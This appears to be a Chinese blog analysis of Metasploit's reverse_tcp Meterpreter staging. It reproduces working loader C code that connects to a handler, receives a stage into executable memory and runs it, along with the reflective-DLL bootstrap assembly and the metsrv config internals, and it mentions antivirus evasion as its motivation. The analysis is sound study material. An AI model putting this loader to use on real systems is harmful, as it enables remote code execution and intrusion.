第一個不能錯過的就是cobalt strike做者早年寫的metasploit-loader項目了,我看了項目源碼,找了一些相關資料git
在 Meterpreter載荷執行原理分析 文章發現了一些細節性的東西,也感謝該文做者的拋磚引玉,不過文中有一些錯誤以及未說明白的地方,我會一一道來。github
No tutorials that I know of, but here are the basic steps:
- connect to the handler
- read a 4-byte length
- allocate a length-byte buffer
- mark it as writable and executable (on Windows you'll need
VirtualProtect for this)- read length bytes into that buffer
- jump to the buffer. easiest way to do this in C is cast it to a
function pointer and call it.
Assuming this is for X86 arch, you have to make sure that the EDI
register contains your socket descriptor (the value of the ConnectSocket
variable). You can do this via inline asm, but it might be easier to
just prepend the 5 bytes for setting it to your shellcode:BF 78 56 34 12 mov edi, 0x12345678
For 64 bit, you have to use the RDI register (and need 10 bytes):
48 BF 78 56 34 12 00 00 00 00 mov rdi, 0x12345678
Hope this helps,
PS: This is the reason why the calling convention within Metasploit is
called "sockedi" 😃
mov edi, &socket
int main(int argc, char * argv[]) { ULONG32 size; char * buffer; void (*function)(); winsock_init(); if (argc != 3) { printf("%s [host] [port]\n", argv[0]); exit(1); } /* connect to the handler */ SOCKET my_socket = wsconnect(argv[1], atoi(argv[2])); /* read the 4-byte length */ int count = recv(my_socket, (char *)&size, 4, 0); if (count != 4 || size <= 0) punt(my_socket, "read a strange or incomplete length value\n"); /* allocate a RWX buffer */ buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (buffer == NULL) punt(my_socket, "could not allocate buffer\n"); /* prepend a little assembly to move our SOCKET value to the EDI register thanks mihi for pointing this out BF 78 56 34 12 => mov edi, 0x12345678 */ buffer[0] = 0xBF; /* copy the value of our socket to the buffer */ memcpy(buffer + 1, &my_socket, 4); /* read bytes into the buffer */ count = recv_all(my_socket, buffer + 5, size); /* cast our buffer as a function and call it */ function = (void (*)())buffer; function(); return 0; }
//主函數 int main(int argc, char * argv[]) { ULONG32 size; char * buffer; //建立函數指針,方便XXOO void (*function)(); winsock_init(); //套接字初始化 //獲取參數,這裏隨便寫,接不接收無所謂,主要是傳遞遠程主機IP和端口 //這個能夠事先定義好 if (argc != 3) { printf("%s [host] [port] ^__^ \n", argv[0]); exit(1); } /*鏈接處處理程序,也就是遠程主機 */ SOCKET my_socket = my_connect(argv[1], atoi(argv[2])); /* 讀取4字節長度 *這裏是meterpreter第一次發送過來的 *4字節緩衝區大小2E840D00,大小可能會有所不一樣,固然也能夠本身丟棄,本身定義一個大小 */ //是否報錯 //若是第一次不是接收的4字節那麼就退出程序 int count = recv(my_socket, (char *)&size, 4, 0); if (count != 4 || size <= 0) punt(my_socket, "read length value Error\n"); /* 分配一個緩衝區 RWX buffer */ buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (buffer == NULL) punt(my_socket, "could not alloc buffer\n"); /* *SOCKET賦值到EDI寄存器,裝載到buffer[]中 */ //mov edi buffer[0] = 0xBF; /* 把咱們的socket裏的值複製到緩衝區中去*/ memcpy(buffer + 1, &my_socket, 4); /* 讀取字節到緩衝區 *這裏就循環接收DLL數據,直到接收完畢 */ count = recv_all(my_socket, buffer + 5, size); /* 將緩衝區做爲函數並調用它。 * 這裏能夠看做是shellcode的裝載, * 由於這自己是一個DLL裝載器,完成使命,控制權交給DLL, * 但自己不退出,除非遷移進程,靠DLL裏函數,DLL在DLLMain裏是循環接收指令的,直到遇到退出指令, * (void (*)())buffer的這種用法常常出如今shellcode中 */ function = (void (*)())buffer; function(); return 0; }
代碼比較長我就不貼了,簡要說一下, asm_block_recv
函數是接收載荷的函數,而後咱們看看 asm_reverse_tcp
create_socket: push #{encoded_host} ; host in little-endian format push #{encoded_port} ; family AF_INET and port number mov esi, esp ; save pointer to sockaddr struct push eax ; if we succeed, eax will be zero, push zero for the flags param. push eax ; push null for reserved parameter push eax ; we do not specify a WSAPROTOCOL_INFO structure push eax ; we do not specify a protocol inc eax ; push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this
call WSASocketA 以後返回的是socket句柄,返回值通常是在eax裏面,而後把eax賦值到了edi
這裏就要引入我剛纔說的先知上的那篇文章的問題了,在 Meterpreter載荷執行原理分析 文章中,做者提到
其實 windows/meterpreter/reverse_tcp
是走的 meterpreter_loader
,而不是文中的 reflectivedllinject
,我經過調試發現這個請求載荷的過程是流經 meterpreter_loader
def stage_meterpreter(opts={}) # Exceptions will be thrown by the mixin if there are issues. dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll')) asm_opts = { rdi_offset: offset, length: dll.length, stageless: opts[:stageless] == true } asm = asm_invoke_metsrv(asm_opts) # generate the bootstrap asm bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry if bootstrap.length > 62 raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... dll[ 0, bootstrap.length ] = bootstrap dll end
這段代碼裏面首先取到了metsrv的dll的文件,而後傳入 asm_invoke_metsrv
咱們看看 load_rdi_dll
函數,這個函數取到了一個偏移量而後傳入 asm_invoke_metsrv
def load_rdi_dll(dll_path) dll = '' ::File.open(dll_path, 'rb') { |f| dll = f.read } offset = parse_pe(dll) unless offset raise "Cannot find the ReflectiveLoader entry point in #{dll_path}" end return dll, offset end def parse_pe(dll) pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll)) offset = nil pe.exports.entries.each do |e| if e.name =~ /^\S*ReflectiveLoader\S*/ offset = pe.rva_to_file_offset(e.rva) break end end offset end
而後進入 asm_invoke_metsrv
def asm_invoke_metsrv(opts={}) asm = %Q^ ; prologue dec ebp ; 'M' pop edx ; 'Z' call $+5 ; call next instruction pop ebx ; get the current location (+7 bytes) push edx ; restore edx inc ebp ; restore ebp push ebp ; save ebp for later mov ebp, esp ; set up a new stack frame ; Invoke ReflectiveLoader() ; add the offset to ReflectiveLoader() (0x????????) add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)} call ebx ; invoke ReflectiveLoader() ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ; offset from ReflectiveLoader() to the end of the DLL add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} ^ unless opts[:stageless] || opts[:force_write_handle] == true asm << %Q^ mov [ebx], edi ; write the current socket/handle to the config ^ end asm << %Q^ push ebx ; push the pointer to the configuration start push 4 ; indicate that we have attached push eax ; push some arbitrary value for hInstance call eax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ^ end
不得不說這段十分巧妙,咱們想一想剛纔的流程是什麼,排開那個 mov edi, &socket
那 dec ebp
和 pop edx
\x4D # dec ebp \x5A # pop edx
剛好構成了MZ頭,而後繼續往下跑,調用了ReflectiveLoader(),這個是反射dll技術,具體代碼技術細節能夠見 https://github.com/stephenfewer/ReflectiveDLLInjection
調用該dll導出函數 ReflectiveLoader
而後調用 mov [ebx], edi ; write the current socket/handle to the config
; offset from ReflectiveLoader() to the end of the DLL add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
push ebx ; push the pointer to the configuration start push 4 ; indicate that we have attached push eax ; push some arbitrary value for hInstance call eax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
def stage_payload(opts={}) stage_meterpreter(opts) + generate_config(opts) end def generate_config(opts={}) ds = opts[:datastore] || datastore opts[:uuid] ||= generate_payload_uuid # create the configuration block, which for staged connections is really simple. config_opts = { arch: opts[:uuid].arch, null_session_guid: opts[:null_session_guid] == true, exitfunk: ds[:exit_func] || ds['EXITFUNC'], expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i, uuid: opts[:uuid], transports: opts[:transport_config] || [transport_config(opts)], extensions: [], stageless: opts[:stageless] == true } # create the configuration instance based off the parameters config = Rex::Payloads::Meterpreter::Config.new(config_opts) # return the binary version of it config.to_b end
能夠看到 stage_payload
跟進 config.to_b
def to_b config_block end def config_block # start with the session information config = session_block(@opts) # then load up the transport configurations (@opts[:transports] || []).each do |t| config << transport_block(t) end # terminate the transports with NULL (wchar) config << "\x00\x00" # configure the extensions - this will have to change when posix comes # into play. file_extension = 'x86.dll' file_extension = 'x64.dll' unless is_x86? (@opts[:extensions] || []).each do |e| config << extension_block(e, file_extension) end # terminate the extensions with a 0 size config << [0].pack('V') # wire in the extension init data (@opts[:ext_init] || '').split(':').each do |cfg| name, value = cfg.split(',') config << extension_init_block(name, value) end # terminate the ext init config with a final null byte config << "\x00" # and we're done config end
而後咱們跟進 session_block
和 transport_block
能夠看到 函數裏面有
session_data = [ 0, # comms socket, patched in by the stager exit_func, # exit function identifer opts[:expiration], # Session expiry uuid, # the UUID session_guid # the Session GUID ] session_data.pack('QVVA*A*')
首先分配完RWX內存空間後,咱們看到了首地址 0x6A0000
,而後咱們在內存窗口中轉到該地址,那咱們重點關注的是dll所在區域的末尾,咱們直接把內存地址轉到 0x6CAC06
首當其衝的就是咱們的 mov edi, &socket
還記得咱們前面分析的源碼中的metsrv dll文件嗎?
咱們能夠在 metasploit-payloads 中找到這個項目的源碼
咱們直接看看metsrc dllmain函數
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { BOOL bReturnValue = TRUE; switch (dwReason) { case DLL_METASPLOIT_ATTACH: bReturnValue = Init((MetsrvConfig*)lpReserved); break; case DLL_QUERY_HMODULE: if (lpReserved != NULL) *(HMODULE*)lpReserved = hAppInstance; break; case DLL_PROCESS_ATTACH: hAppInstance = hinstDLL; break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: break; } return bReturnValue; }
剛纔調用dllmain咱們是使用了 calleax ;call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
咱們這個 config_ptr
傳遞的是什麼?是 push ebx ; push the pointer to the configuration start
,也就是那個首8位塞了咱們socket句柄地址的數據的起始地址,而後走 DLL_METASPLOIT_ATTACH
分支,把這個地址中的數據強轉爲了 MetsrvConfig
咱們看看 MetsrvConfig
typedef struct _MetsrvConfig { MetsrvSession session; MetsrvTransportCommon transports[1]; ///! Placeholder for 0 or more transports // Extensions will appear after this // After extensions, we get a list of extension initialisers // <name of extension>\x00<datasize><data> // <name of extension>\x00<datasize><data> // \x00 } MetsrvConfig; typedef struct _MetsrvSession { union { UINT_PTR handle; BYTE padding[8]; } comms_handle; ///! Socket/handle for communications (if there is one). DWORD exit_func; ///! Exit func identifier for when the session ends. int expiry; ///! The total number of seconds to wait before killing off the session. BYTE uuid[UUID_SIZE]; ///! UUID BYTE session_guid[sizeof(GUID)]; ///! Current session GUID } MetsrvSession; typedef struct _MetsrvTransportCommon { CHARTYPE url[URL_SIZE]; ///! Transport url: scheme://host:port/URI int comms_timeout; ///! Number of sessions to wait for a new packet. int retry_total; ///! Total seconds to retry comms for. int retry_wait; ///! Seconds to wait between reconnects. } MetsrvTransportCommon;
union { UINT_PTR handle; BYTE padding[8]; } comms_handle; ///! Socket/handle for communications (if there is one).
也就是咱們找找 comms_handle
因此進到 Init((MetsrvConfig*)lpReserved)
DWORD Init(MetsrvConfig* metConfig) { // if hAppInstance is still == NULL it means that we havent been // reflectivly loaded so we must patch in the hAppInstance value // for use with loading server extensions later. InitAppInstance(); // In the case of metsrv payloads, the parameter passed to init is NOT a socket, it's actually // a pointer to the metserv configuration, so do a nasty cast and move on. dprintf("[METSRV] Getting ready to init with config %p", metConfig); DWORD result = server_setup(metConfig); dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func); // We also handle exit func directly in metsrv now because the value is added to the // configuration block and we manage to save bytes in the stager/header as well. switch (metConfig->session.exit_func) { case EXITFUNC_SEH: SetUnhandledExceptionFilter(NULL); break; case EXITFUNC_THREAD: ExitThread(0); break; case EXITFUNC_PROCESS: ExitProcess(0); break; default: break; } return result; }
裏面調用了 server_setup
而後吐出告終果,最後返回,跟到外層也就是dllmain的返回值,dllmain返回值做用我不贅述了,而後根據你的生成選項中的 EXITFUNC
來進行退出,退出進程、線程或者SEH異常,這裏咱們無論,咱們看看 server_setup
使用了 comms_handle
... dprintf("[SESSION] Comms handle: %u", config->session.comms_handle); ... dprintf("[DISPATCH] Transport handle is %p", (LPVOID)config->session.comms_handle.handle); if (remote->transport->set_handle) { remote->transport->set_handle(remote->transport, config->session.comms_handle.handle); }
根據這些代碼咱們可以知道是把 Transport handle 設置爲了咱們以前建立的socket
而後跟進 transport_set_handle_tcp
/*! * @brief Get the socket from the transport (if it's TCP). * @param transport Pointer to the TCP transport containing the socket. * @return The current transport socket FD, if any, or zero. */ static UINT_PTR transport_get_handle_tcp(Transport* transport) { if (transport && transport->type == METERPRETER_TRANSPORT_TCP) { return (UINT_PTR)((TcpTransportContext*)transport->ctx)->fd; } return 0; } /*! * @brief Set the socket from the transport (if it's TCP). * @param transport Pointer to the TCP transport containing the socket. * @param handle The current transport socket FD, if any. */ static void transport_set_handle_tcp(Transport* transport, UINT_PTR handle) { if (transport && transport->type == METERPRETER_TRANSPORT_TCP) { ((TcpTransportContext*)transport->ctx)->fd = (SOCKET)handle; } }
此次的分析耗時一天,從上午看到討論免殺,加載器,而後開始分析,說實話,仍是收穫了很多,好比那個反射dll的改dos頭就讓我不得不佩服,臥槽,這操做騷。本次只是拿 windows/meterpreter/reverse_tcp
開刀,我相信其餘的也同樣,否則何以被官方稱 sockedi